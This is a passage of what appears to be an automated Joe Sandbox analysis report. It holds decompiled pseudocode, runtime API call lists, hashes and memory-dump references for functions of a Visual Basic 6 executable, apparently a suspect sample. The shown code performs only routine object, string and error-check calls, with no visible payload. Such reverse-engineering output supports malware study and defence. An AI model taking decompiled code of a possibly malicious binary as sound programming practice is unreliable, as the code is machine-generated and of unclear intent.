Instruction ID: 3545df116dcbd04cd5bec1ac8d7e54ecc68eba0854eeedf504714f661d56ad9b
Opcode Fuzzy Hash: e922b65aec5b82ea8845fe568e467f6f52b8d47de3e9d2f398b3647c3c4acee6
Instruction Fuzzy Hash: 0EA19371D00218DBDB11DF91DC45BCE7BB9BF05304F5084AAF508BB291DBB95A898F54

Uniqueness

Uniqueness Score: 100.00%

Function 00431385, Relevance: 52.9, APIs: 29, Strings: 1, Instructions: 416
UNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 52%

			E00431385(void* __ecx) {
				signed int _v8;
				short _v12;
				signed int _v20;
				void* _v24;
				short _v28;
				short _v32;
				intOrPtr _v40;
				intOrPtr _v48;
				char _v56;
				intOrPtr _v64;
				short _v68;
				char _v72;
				intOrPtr* _v76;
				signed int _v80;
				intOrPtr* _v84;
				signed int _v88;
				intOrPtr* _v92;
				signed int _v96;
				intOrPtr* _v100;
				signed int _v104;
				intOrPtr* _v108;
				signed int _v112;
				intOrPtr* _v116;
				signed int _v120;
				intOrPtr* _v124;
				signed int _v128;
				intOrPtr* _v132;
				signed int _v136;
				intOrPtr* _v140;
				signed int _v144;
				intOrPtr* _v148;
				signed int _v152;
				intOrPtr* _v156;
				signed int _v160;
				intOrPtr* _v164;
				signed int _v168;
				intOrPtr* _v172;
				signed int _v176;
				signed int _t196;
				signed int _t201;
				signed int _t206;
				signed int _t214;
				signed int _t220;
				signed int _t227;
				signed int _t233;
				signed int _t238;
				signed int _t244;
				signed int _t251;
				signed int _t257;
				signed int _t262;
				void* _t264;
				signed int _t302;
				signed int _t303;

				_t264 = __ecx;
				L00401740();
				if(E00431374() == 0xffff) {
					E00431385(__ecx);
				}
				if( *0x432010 != 0) {
					_v84 = 0x432010;
				} else {
					_push("��\");
					_push(0x4268c0);
					L004018B4();
					_v84 = 0x432010;
				}
				_v76 =  *_v84;
				_v20 =  *0x40173c;
				_v24 =  *0x401738;
				_t196 =  *((intOrPtr*)( *_v76 + 0x2d4))(_v76, 0, _t264, _t264, 0);
				asm("fclex");
				_v80 = _t196;
				if(_v80 >= 0) {
					_v88 = _v88 & 0x00000000;
				} else {
					_push(0x2d4);
					_push(0x425bb4);
					_push(_v76);
					_push(_v80);
					L004018AE();
					_v88 = _t196;
				}
				if( *0x432010 != 0) {
					_v92 = 0x432010;
				} else {
					_push("��\");
					_push(0x4268c0);
					L004018B4();
					_v92 = 0x432010;
				}
				_v76 =  *_v92;
				_t201 =  *((intOrPtr*)( *_v76 + 0xc4))(_v76, 0xffffffff);
				asm("fclex");
				_v80 = _t201;
				if(_v80 >= 0) {
					_v96 = _v96 & 0x00000000;
				} else {
					_push(0xc4);
					_push(0x425bb4);
					_push(_v76);
					_push(_v80);
					L004018AE();
					_v96 = _t201;
				}
				if( *0x432010 != 0) {
					_v100 = 0x432010;
				} else {
					_push("��\");
					_push(0x4268c0);
					L004018B4();
					_v100 = 0x432010;
				}
				_v76 =  *_v100;
				_t206 =  *((intOrPtr*)( *_v76 + 0xbc))(_v76, 0xffffffff);
				asm("fclex");
				_v80 = _t206;
				if(_v80 >= 0) {
					_v104 = _v104 & 0x00000000;
				} else {
					_push(0xbc);
					_push(0x425bb4);
					_push(_v76);
					_push(_v80);
					L004018AE();
					_v104 = _t206;
				}
				if( *0x432010 != 0) {
					_v108 = 0x432010;
				} else {
					_push("��\");
					_push(0x4268c0);
					L004018B4();
					_v108 = 0x432010;
				}
				_v76 =  *_v108;
				_v56 = 1;
				_v64 = 2;
				_v40 = 1;
				_v48 = 2;
				L00401740();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L00401740();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v56 =  *0x401734;
				_t214 =  *((intOrPtr*)( *_v76 + 0x2e0))(_v76, _t264, 0x10, 0x10,  &_v72);
				asm("fclex");
				_v80 = _t214;
				if(_v80 >= 0) {
					_v112 = _v112 & 0x00000000;
				} else {
					_push(0x2e0);
					_push(0x425bb4);
					_push(_v76);
					_push(_v80);
					L004018AE();
					_v112 = _t214;
				}
				if( *0x432010 != 0) {
					_v116 = 0x432010;
				} else {
					_push("��\");
					_push(0x4268c0);
					L004018B4();
					_v116 = 0x432010;
				}
				_v76 =  *_v116;
				_t220 =  *((intOrPtr*)( *_v76 + 0x278))(_v76,  &_v68);
				asm("fclex");
				_v80 = _t220;
				if(_v80 >= 0) {
					_v120 = _v120 & 0x00000000;
				} else {
					_push(0x278);
					_push(0x425bb4);
					_push(_v76);
					_push(_v80);
					L004018AE();
					_v120 = _t220;
				}
				_v24 = _v68;
				if( *0x432010 != 0) {
					_v124 = 0x432010;
				} else {
					_push("��\");
					_push(0x4268c0);
					L004018B4();
					_v124 = 0x432010;
				}
				_v76 =  *_v124;
				_t227 =  *((intOrPtr*)( *_v76 + 0x90))(_v76,  &_v68);
				asm("fclex");
				_v80 = _t227;
				if(_v80 >= 0) {
					_v128 = _v128 & 0x00000000;
				} else {
					_push(0x90);
					_push(0x425bb4);
					_push(_v76);
					_push(_v80);
					L004018AE();
					_v128 = _t227;
				}
				_v32 = _v68;
				if( *0x432010 != 0) {
					_v132 = 0x432010;
				} else {
					_push("��\");
					_push(0x4268c0);
					L004018B4();
					_v132 = 0x432010;
				}
				_v76 =  *_v132;
				_t233 =  *((intOrPtr*)( *_v76 + 0x144))(_v76, 1);
				asm("fclex");
				_v80 = _t233;
				if(_v80 >= 0) {
					_v136 = _v136 & 0x00000000;
				} else {
					_push(0x144);
					_push(0x425bb4);
					_push(_v76);
					_push(_v80);
					L004018AE();
					_v136 = _t233;
				}
				if( *0x432010 != 0) {
					_v140 = 0x432010;
				} else {
					_push("��\");
					_push(0x4268c0);
					L004018B4();
					_v140 = 0x432010;
				}
				_v76 =  *_v140;
				_t302 =  *0x401730;
				_v88 = _t302;
				_t238 =  *((intOrPtr*)( *_v76 + 0x8c))(_v76, _t264);
				asm("fclex");
				_v80 = _t238;
				if(_v80 >= 0) {
					_v144 = _v144 & 0x00000000;
				} else {
					_push(0x8c);
					_push(0x425bb4);
					_push(_v76);
					_push(_v80);
					L004018AE();
					_v144 = _t238;
				}
				if( *0x432010 != 0) {
					_v148 = 0x432010;
				} else {
					_push("��\");
					_push(0x4268c0);
					L004018B4();
					_v148 = 0x432010;
				}
				_v76 =  *_v148;
				_t244 =  *((intOrPtr*)( *_v76 + 0x178))(_v76,  &_v68);
				asm("fclex");
				_v80 = _t244;
				if(_v80 >= 0) {
					_v152 = _v152 & 0x00000000;
				} else {
					_push(0x178);
					_push(0x425bb4);
					_push(_v76);
					_push(_v80);
					L004018AE();
					_v152 = _t244;
				}
				_v12 = _v68;
				if( *0x432010 != 0) {
					_v156 = 0x432010;
				} else {
					_push("��\");
					_push(0x4268c0);
					L004018B4();
					_v156 = 0x432010;
				}
				_v76 =  *_v156;
				_t251 =  *((intOrPtr*)( *_v76 + 0x1c8))(_v76,  &_v68);
				asm("fclex");
				_v80 = _t251;
				if(_v80 >= 0) {
					_v160 = _v160 & 0x00000000;
				} else {
					_push(0x1c8);
					_push(0x425bb4);
					_push(_v76);
					_push(_v80);
					L004018AE();
					_v160 = _t251;
				}
				_v28 = _v68;
				if( *0x432010 != 0) {
					_v164 = 0x432010;
				} else {
					_push("��\");
					_push(0x4268c0);
					L004018B4();
					_v164 = 0x432010;
				}
				_v76 =  *_v164;
				asm("fld1");
				_v112 = _t302;
				_t257 =  *((intOrPtr*)( *_v76 + 0x104))(_v76, _t264);
				asm("fclex");
				_v80 = _t257;
				if(_v80 >= 0) {
					_v168 = _v168 & 0x00000000;
				} else {
					_push(0x104);
					_push(0x425bb4);
					_push(_v76);
					_push(_v80);
					L004018AE();
					_v168 = _t257;
				}
				if( *0x432010 != 0) {
					_v172 = 0x432010;
				} else {
					_push("��\");
					_push(0x4268c0);
					L004018B4();
					_v172 = 0x432010;
				}
				_v76 =  *_v172;
				_t262 =  *((intOrPtr*)( *_v76 + 0x2b4))(_v76);
				asm("fclex");
				_v80 = _t262;
				if(_v80 >= 0) {
					_v176 = _v176 & 0x00000000;
				} else {
					_push(0x2b4);
					_push(0x425bb4);
					_push(_v76);
					_push(_v80);
					L004018AE();
					_v176 = _t262;
				}
				 *0x432024 = 0x62f7f2f7;
				_push(0xff);
				_push(_t262);
				E00422411();
				_v128 = _t302;
				asm("fld1");
				_push(_t264);
				_push(_t264);
				_v136 = _t302;
				_t303 =  *0x401728;
				_push(_t264);
				_push(_t264);
				_v144 = _t303;
				L004018A2();
				_v20 = _t303;
				L004018DE();
				_v8 = _t262;
				return _t262;
			}

0x00431385
0x0043138d
0x0043139d
0x0043139f
0x0043139f
0x004313ab
0x004313c5
0x004313ad
0x004313ad
0x004313b2
0x004313b7
0x004313bc
0x004313bc
0x004313d1
0x004313dd
0x004313e7
0x004313f4
0x004313fa
0x004313fc
0x00431403
0x0043141f
0x00431405
0x00431405
0x0043140a
0x0043140f
0x00431412
0x00431415
0x0043141a
0x0043141a
0x0043142a
0x00431444
0x0043142c
0x0043142c
0x00431431
0x00431436
0x0043143b
0x0043143b
0x00431450
0x0043145d
0x00431463
0x00431465
0x0043146c
0x00431488
0x0043146e
0x0043146e
0x00431473
0x00431478
0x0043147b
0x0043147e
0x00431483
0x00431483
0x00431493
0x004314ad
0x00431495
0x00431495
0x0043149a
0x0043149f
0x004314a4
0x004314a4
0x004314b9
0x004314c6
0x004314cc
0x004314ce
0x004314d5
0x004314f1
0x004314d7
0x004314d7
0x004314dc
0x004314e1
0x004314e4
0x004314e7
0x004314ec
0x004314ec
0x004314fc
0x00431516
0x004314fe
0x004314fe
0x00431503
0x00431508
0x0043150d
0x0043150d
0x00431522
0x00431525
0x0043152c
0x00431533
0x0043153a
0x00431548
0x00431552
0x00431553
0x00431554
0x00431555
0x00431559
0x00431563
0x00431564
0x00431565
0x00431566
0x0043156e
0x00431579
0x0043157f
0x00431581
0x00431588
0x004315a4
0x0043158a
0x0043158a
0x0043158f
0x00431594
0x00431597
0x0043159a
0x0043159f
0x0043159f
0x004315af
0x004315c9
0x004315b1
0x004315b1
0x004315b6
0x004315bb
0x004315c0
0x004315c0
0x004315d5
0x004315e4
0x004315ea
0x004315ec
0x004315f3
0x0043160f
0x004315f5
0x004315f5
0x004315fa
0x004315ff
0x00431602
0x00431605
0x0043160a
0x0043160a
0x00431617
0x00431621
0x0043163b
0x00431623
0x00431623
0x00431628
0x0043162d
0x00431632
0x00431632
0x00431647
0x00431656
0x0043165c
0x0043165e
0x00431665
0x00431681
0x00431667
0x00431667
0x0043166c
0x00431671
0x00431674
0x00431677
0x0043167c
0x0043167c
0x00431689
0x00431693
0x004316ad
0x00431695
0x00431695
0x0043169a
0x0043169f
0x004316a4
0x004316a4
0x004316b9
0x004316c6
0x004316cc
0x004316ce
0x004316d5
0x004316f4
0x004316d7
0x004316d7
0x004316dc
0x004316e1
0x004316e4
0x004316e7
0x004316ec
0x004316ec
0x00431702
0x0043171f
0x00431704
0x00431704
0x00431709
0x0043170e
0x00431713
0x00431713
0x00431731
0x00431734
0x0043173b
0x00431746
0x0043174c
0x0043174e
0x00431755
0x00431774
0x00431757
0x00431757
0x0043175c
0x00431761
0x00431764
0x00431767
0x0043176c
0x0043176c
0x00431782
0x0043179f
0x00431784
0x00431784
0x00431789
0x0043178e
0x00431793
0x00431793
0x004317b1
0x004317c0
0x004317c6
0x004317c8
0x004317cf
0x004317ee
0x004317d1
0x004317d1
0x004317d6
0x004317db
0x004317de
0x004317e1
0x004317e6
0x004317e6
0x004317f9
0x00431803
0x00431820
0x00431805
0x00431805
0x0043180a
0x0043180f
0x00431814
0x00431814
0x00431832
0x00431841
0x00431847
0x00431849
0x00431850
0x0043186f
0x00431852
0x00431852
0x00431857
0x0043185c
0x0043185f
0x00431862
0x00431867
0x00431867
0x0043187a
0x00431884
0x004318a1
0x00431886
0x00431886
0x0043188b
0x00431890
0x00431895
0x00431895
0x004318b3
0x004318b6
0x004318b9
0x004318c4
0x004318ca
0x004318cc
0x004318d3
0x004318f2
0x004318d5
0x004318d5
0x004318da
0x004318df
0x004318e2
0x004318e5
0x004318ea
0x004318ea
0x00431900
0x0043191d
0x00431902
0x00431902
0x00431907
0x0043190c
0x00431911
0x00431911
0x0043192f
0x0043193a
0x00431940
0x00431942
0x00431949
0x00431968
0x0043194b
0x0043194b
0x00431950
0x00431955
0x00431958
0x0043195b
0x00431960
0x00431960
0x0043196f
0x00431979
0x0043197e
0x0043197f
0x00431984
0x00431987
0x00431989
0x0043198a
0x0043198b
0x0043198e
0x00431994
0x00431995
0x00431996
0x00431999
0x0043199e
0x004319a7
0x004319ac
0x004319b2

APIs

__vbaChkstk.MSVBVM60(?,0042E52F), ref: 0043138D

Part of subcall function 00431374: __vbaChkstk.MSVBVM60(?,00431399,?,?,?,0042E52F), ref: 0043137A

__vbaNew2.MSVBVM60(004268C0,\,?,?,?,0042E52F), ref: 004313B7
__vbaHresultCheckObj.MSVBVM60(00000000,?,00425BB4,000002D4,?,?,00000000,?,?,?,0042E52F), ref: 00431415
__vbaNew2.MSVBVM60(004268C0,\,?,?,00000000,?,?,?,0042E52F), ref: 00431436
__vbaHresultCheckObj.MSVBVM60(00000000,?,00425BB4,000000C4,?,?,00000000,?,?,?,0042E52F), ref: 0043147E
__vbaNew2.MSVBVM60(004268C0,\,?,?,00000000,?,?,?,0042E52F), ref: 0043149F
__vbaHresultCheckObj.MSVBVM60(00000000,?,00425BB4,000000BC,?,?,00000000,?,?,?,0042E52F), ref: 004314E7
__vbaNew2.MSVBVM60(004268C0,\,?,?,00000000,?,?,?,0042E52F), ref: 00431508

Part of subcall function 00431385: __vbaChkstk.MSVBVM60(?,?,?,00000000,?,?,?,0042E52F), ref: 00431548
Part of subcall function 00431385: __vbaChkstk.MSVBVM60(?,?,?,00000000,?,?,?,0042E52F), ref: 00431559
Part of subcall function 00431385: __vbaHresultCheckObj.MSVBVM60(00000000,?,00425BB4,000002E0,?,?,?,?,00000000,?,?,?,0042E52F), ref: 0043159A
Part of subcall function 00431385: __vbaNew2.MSVBVM60(004268C0,\,?,?,?,?,00000000,?,?,?,0042E52F), ref: 004315BB
Part of subcall function 00431385: __vbaHresultCheckObj.MSVBVM60(00000000,?,00425BB4,00000278,?,?,?,?,00000000,?,?,?,0042E52F), ref: 00431605
Part of subcall function 00431385: __vbaNew2.MSVBVM60(004268C0,\,?,?,?,?,00000000,?,?,?,0042E52F), ref: 0043162D
Part of subcall function 00431385: __vbaHresultCheckObj.MSVBVM60(00000000,?,00425BB4,00000090,?,?,?,?,00000000,?,?,?,0042E52F), ref: 00431677

__vbaNew2.MSVBVM60(004268C0,\,?,?,?,?,00000000,?,?,?,0042E52F), ref: 0043169F
__vbaHresultCheckObj.MSVBVM60(00000000,?,00425BB4,00000144,?,?,?,?,00000000,?,?,?,0042E52F), ref: 004316E7
__vbaNew2.MSVBVM60(004268C0,\,?,?,?,?,00000000,?,?,?,0042E52F), ref: 0043170E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00425BB4,0000008C,?,?,?,?,?,00000000,?,?,?,0042E52F), ref: 00431767
__vbaNew2.MSVBVM60(004268C0,\,?,?,?,?,?,00000000,?,?,?,0042E52F), ref: 0043178E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00425BB4,00000178,?,?,?,?,?,00000000,?,?,?,0042E52F), ref: 004317E1
__vbaNew2.MSVBVM60(004268C0,\,?,?,?,?,?,00000000,?,?,?,0042E52F), ref: 0043180F
__vbaHresultCheckObj.MSVBVM60(00000000,?,00425BB4,000001C8,?,?,?,?,?,00000000,?,?,?,0042E52F), ref: 00431862
__vbaNew2.MSVBVM60(004268C0,\,?,?,?,?,?,00000000,?,?,?,0042E52F), ref: 00431890
__vbaHresultCheckObj.MSVBVM60(00000000,?,00425BB4,00000104,?,?,?,?,?,?,00000000,?,?,?,0042E52F), ref: 004318E5
__vbaNew2.MSVBVM60(004268C0,\,?,?,?,?,?,?,00000000,?,?,?,0042E52F), ref: 0043190C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00425BB4,000002B4,?,?,?,?,?,?,00000000,?,?,?,0042E52F), ref: 0043195B
#672.MSVBVM60(?,?,?,?,00000000,000000FF,?,?,?,?,?,?,00000000), ref: 00431999
__vbaR8FixI4.MSVBVM60(?,?,?,?,00000000,000000FF,?,?,?,?,?,?,00000000), ref: 004319A7

Strings

\, xrefs: 004313A4, 004313AD, 004313BC, 004313C5, 00431423, 0043142C, 0043143B, 00431444, 0043148C, 00431495, 004314A4, 004314AD, 004314F5, 004314FE, 0043150D, 00431516, 004315A8, 004315B1, 004315C0, 004315C9, 0043161A, 00431623, 00431632, 0043163B, 0043168C, 00431695, 004316A4, 004316AD, 004316FB, 00431704, 00431713, 0043171F, 0043177B, 00431784, 00431793, 0043179F, 004317FC, 00431805, 00431814, 00431820, 0043187D, 00431886, 00431895, 004318A1, 004318F9, 00431902, 00431911, 0043191D

Memory Dump Source

Source File: 00000003.00000002.15788608764.0000000000415000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.15788348069.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.15788416137.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000003.00000002.15788780967.0000000000432000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.15788833807.0000000000433000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_bF7H5z6B1q.jbxd

Yara matches

Similarity

API ID: __vba$CheckHresultNew2$Chkstk$#672
String ID: \
API String ID: 2557950221-417808876
Opcode ID: a458d876ee389d686531408bd3c42cc496aed0b757adad0f250506c8bc1ec8de
Instruction ID: 5b6f2675cea75b840d7a95af0c71851868d5b1d12827f7aea8b2b050dbb3a44f
Opcode Fuzzy Hash: a458d876ee389d686531408bd3c42cc496aed0b757adad0f250506c8bc1ec8de
Instruction Fuzzy Hash: 04023A74E00218DFDF24EF91C949B9CBBB1BF08304F14546AE551BB2A1C7B9198AEF09

Uniqueness

Uniqueness Score: 100.00%

Function 0042EA63, Relevance: 30.2, APIs: 20, Instructions: 163
UNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 60%

			E0042EA63(void* __ebx, void* __edi, void* __esi, intOrPtr __fp0, intOrPtr* _a4, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				void* _v32;
				void* _v36;
				void* _v48;
				signed int _v52;
				char _v56;
				char _v64;
				char _v72;
				intOrPtr* _v92;
				signed int _v96;
				intOrPtr* _v100;
				signed int _v104;
				signed int _v116;
				intOrPtr* _v120;
				signed int _v124;
				signed int _v128;
				intOrPtr* _v132;
				signed int _v136;
				signed int _v140;
				signed int _t96;
				signed int _t101;
				char* _t103;
				signed int _t109;
				signed int _t113;
				void* _t130;
				void* _t132;
				intOrPtr _t133;
				intOrPtr _t141;

				_t141 = __fp0;
				_t133 = _t132 - 0xc;
				 *[fs:0x0] = _t133;
				L00401740();
				_v16 = _t133;
				_v12 = 0x4014f8;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x74,  *[fs:0x0], 0x401746, _t130);
				L004018D8();
				_v64 = 2;
				_v72 = 2;
				_push( &_v72);
				L0040181E();
				L00401872();
				L0040186C();
				if( *0x432400 != 0) {
					_v120 = 0x432400;
				} else {
					_push(0x432400);
					_push(0x4263e8);
					L004018B4();
					_v120 = 0x432400;
				}
				_v92 =  *_v120;
				_t96 =  *((intOrPtr*)( *_v92 + 0x14))(_v92,  &_v56);
				asm("fclex");
				_v96 = _t96;
				if(_v96 >= 0) {
					_v124 = _v124 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x4263d8);
					_push(_v92);
					_push(_v96);
					L004018AE();
					_v124 = _t96;
				}
				_v100 = _v56;
				_t101 =  *((intOrPtr*)( *_v100 + 0x60))(_v100,  &_v52);
				asm("fclex");
				_v104 = _t101;
				if(_v104 >= 0) {
					_v128 = _v128 & 0x00000000;
				} else {
					_push(0x60);
					_push(0x426548);
					_push(_v100);
					_push(_v104);
					L004018AE();
					_v128 = _t101;
				}
				_v116 = _v52;
				_t44 =  &_v52;
				 *_t44 = _v52 & 0x00000000;
				L00401872();
				L004018A8();
				asm("fldz");
				L004017AC();
				asm("fcomp qword [0x4014f0]");
				asm("fnstsw ax");
				asm("sahf");
				if( *_t44 != 0) {
					if( *0x432400 != 0) {
						_v132 = 0x432400;
					} else {
						_push(0x432400);
						_push(0x4263e8);
						L004018B4();
						_v132 = 0x432400;
					}
					_v92 =  *_v132;
					_t109 =  *((intOrPtr*)( *_v92 + 0x1c))(_v92,  &_v56);
					asm("fclex");
					_v96 = _t109;
					if(_v96 >= 0) {
						_v136 = _v136 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x4263d8);
						_push(_v92);
						_push(_v96);
						L004018AE();
						_v136 = _t109;
					}
					_v100 = _v56;
					_t113 =  *((intOrPtr*)( *_v100 + 0x50))(_v100);
					asm("fclex");
					_v104 = _t113;
					if(_v104 >= 0) {
						_v140 = _v140 & 0x00000000;
					} else {
						_push(0x50);
						_push(0x4263f8);
						_push(_v100);
						_push(_v104);
						L004018AE();
						_v140 = _t113;
					}
					L004018A8();
				}
				_v64 = 0x80020004;
				_v72 = 0xa;
				_t103 =  &_v72;
				_push(_t103);
				L00401818();
				_v28 = _t141;
				L0040186C();
				asm("wait");
				_push(0x42ecb6);
				L004018D2();
				L004018D2();
				L004018D2();
				return _t103;
			}

0x0042ea63
0x0042ea66
0x0042ea75
0x0042ea7f
0x0042ea87
0x0042ea8a
0x0042ea91
0x0042eaa0
0x0042eaa9
0x0042eaae
0x0042eab5
0x0042eabf
0x0042eac0
0x0042eaca
0x0042ead2
0x0042eade
0x0042eaf8
0x0042eae0
0x0042eae0
0x0042eae5
0x0042eaea
0x0042eaef
0x0042eaef
0x0042eb04
0x0042eb13
0x0042eb16
0x0042eb18
0x0042eb1f
0x0042eb38
0x0042eb21
0x0042eb21
0x0042eb23
0x0042eb28
0x0042eb2b
0x0042eb2e
0x0042eb33
0x0042eb33
0x0042eb3f
0x0042eb4e
0x0042eb51
0x0042eb53
0x0042eb5a
0x0042eb73
0x0042eb5c
0x0042eb5c
0x0042eb5e
0x0042eb63
0x0042eb66
0x0042eb69
0x0042eb6e
0x0042eb6e
0x0042eb7a
0x0042eb7d
0x0042eb7d
0x0042eb87
0x0042eb8f
0x0042eb94
0x0042eb96
0x0042eb9b
0x0042eba1
0x0042eba3
0x0042eba4
0x0042ebb1
0x0042ebcb
0x0042ebb3
0x0042ebb3
0x0042ebb8
0x0042ebbd
0x0042ebc2
0x0042ebc2
0x0042ebd7
0x0042ebe6
0x0042ebe9
0x0042ebeb
0x0042ebf2
0x0042ec0e
0x0042ebf4
0x0042ebf4
0x0042ebf6
0x0042ebfb
0x0042ebfe
0x0042ec01
0x0042ec06
0x0042ec06
0x0042ec18
0x0042ec23
0x0042ec26
0x0042ec28
0x0042ec2f
0x0042ec4b
0x0042ec31
0x0042ec31
0x0042ec33
0x0042ec38
0x0042ec3b
0x0042ec3e
0x0042ec43
0x0042ec43
0x0042ec55
0x0042ec55
0x0042ec5a
0x0042ec61
0x0042ec68
0x0042ec6b
0x0042ec6c
0x0042ec71
0x0042ec77
0x0042ec7c
0x0042ec7d
0x0042eca0
0x0042eca8
0x0042ecb0
0x0042ecb5

APIs

__vbaChkstk.MSVBVM60(?,00401746), ref: 0042EA7F
__vbaStrCopy.MSVBVM60(?,?,?,?,00401746), ref: 0042EAA9
#536.MSVBVM60(00000002), ref: 0042EAC0
__vbaStrMove.MSVBVM60(00000002), ref: 0042EACA
__vbaFreeVar.MSVBVM60(00000002), ref: 0042EAD2
__vbaNew2.MSVBVM60(004263E8,00432400,00000002), ref: 0042EAEA
__vbaHresultCheckObj.MSVBVM60(00000000,?,004263D8,00000014,?,?,?,?,?,?,?,?,?,?,?,00000002), ref: 0042EB2E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00426548,00000060,?,?,?,?,?,?,?,?,?,?,?,00000002), ref: 0042EB69
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000002), ref: 0042EB87
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000002), ref: 0042EB8F
_CIexp.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000002), ref: 0042EB96
__vbaNew2.MSVBVM60(004263E8,00432400,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002), ref: 0042EBBD
__vbaHresultCheckObj.MSVBVM60(00000000,?,004263D8,0000001C), ref: 0042EC01
__vbaHresultCheckObj.MSVBVM60(00000000,?,004263F8,00000050), ref: 0042EC3E
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002), ref: 0042EC55
#593.MSVBVM60(0000000A,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002), ref: 0042EC6C
__vbaFreeVar.MSVBVM60(0000000A,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002), ref: 0042EC77
__vbaFreeStr.MSVBVM60(0042ECB6,0000000A,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002), ref: 0042ECA0
__vbaFreeStr.MSVBVM60(0042ECB6,0000000A,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002), ref: 0042ECA8
__vbaFreeStr.MSVBVM60(0042ECB6,0000000A,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002), ref: 0042ECB0

Memory Dump Source

Source File: 00000003.00000002.15788608764.0000000000415000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.15788348069.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.15788416137.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000003.00000002.15788780967.0000000000432000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.15788833807.0000000000433000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_bF7H5z6B1q.jbxd

Yara matches

Similarity

API ID: __vba$Free$CheckHresult$MoveNew2$#536#593ChkstkCopyIexp
String ID:
API String ID: 3161746701-0
Opcode ID: 2365396aafef2c8d2fd534b708a98ed738eb06d8dc79c7e9ef0bb5aa6626e214
Instruction ID: 04c22be0edc7f97269f0a0841132aed1a2d275df5e7dc203f99a026b7c9f8ee9
Opcode Fuzzy Hash: 2365396aafef2c8d2fd534b708a98ed738eb06d8dc79c7e9ef0bb5aa6626e214
Instruction Fuzzy Hash: BE61B671E00218EFDB10EFE6D945B9DBBB1BF14309F60842AE005BB2A1D7785A45DF58

Uniqueness

Uniqueness Score: 100.00%

Function 0042D000, Relevance: 7.5, APIs: 5, Instructions: 32
UNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E0042D000(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8, void* _a32) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				void* _t17;
				void* _t27;
				void* _t29;
				intOrPtr _t30;

				_t30 = _t29 - 0xc;
				 *[fs:0x0] = _t30;
				L00401740();
				_v16 = _t30;
				_v12 = 0x4012e0;
				_v8 = 0;
				_t17 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x14,  *[fs:0x0], 0x401746, _t27);
				L004018D8();
				L004018D8();
				_push(0x42d06c);
				L004018D2();
				L004018D2();
				return _t17;
			}

0x0042d003
0x0042d012
0x0042d01c
0x0042d024
0x0042d027
0x0042d02e
0x0042d03d
0x0042d046
0x0042d051
0x0042d056
0x0042d05e
0x0042d066
0x0042d06b

APIs

__vbaChkstk.MSVBVM60(?,00401746), ref: 0042D01C
__vbaStrCopy.MSVBVM60(?,?,?,?,00401746), ref: 0042D046
__vbaStrCopy.MSVBVM60(?,?,?,?,00401746), ref: 0042D051
__vbaFreeStr.MSVBVM60(0042D06C,?,?,?,?,00401746), ref: 0042D05E
__vbaFreeStr.MSVBVM60(0042D06C,?,?,?,?,00401746), ref: 0042D066

Memory Dump Source

Source File: 00000003.00000002.15788608764.0000000000415000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.15788348069.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.15788416137.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000003.00000002.15788780967.0000000000432000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.15788833807.0000000000433000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_bF7H5z6B1q.jbxd

Yara matches

Similarity

API ID: __vba$CopyFree$Chkstk
String ID:
API String ID: 1531721220-0
Opcode ID: 1d3015551f1f2483f335d67c639ace127d604c088dc4e38b67064cabb2377770
Instruction ID: a5feacad34a8e649dd25a190631327d1dd87c37efa70a41cec265f768af9e720
Opcode Fuzzy Hash: 1d3015551f1f2483f335d67c639ace127d604c088dc4e38b67064cabb2377770
Instruction Fuzzy Hash: 48F0F431900209EFCB00EF56C986B9E7B74EF05744F50C06AF505772E1D7789A05CB84

Uniqueness

Uniqueness Score: 100.00%

Function 004312D0, Relevance: 7.5, APIs: 5, Instructions: 32
UNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E004312D0(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12, void* _a28) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
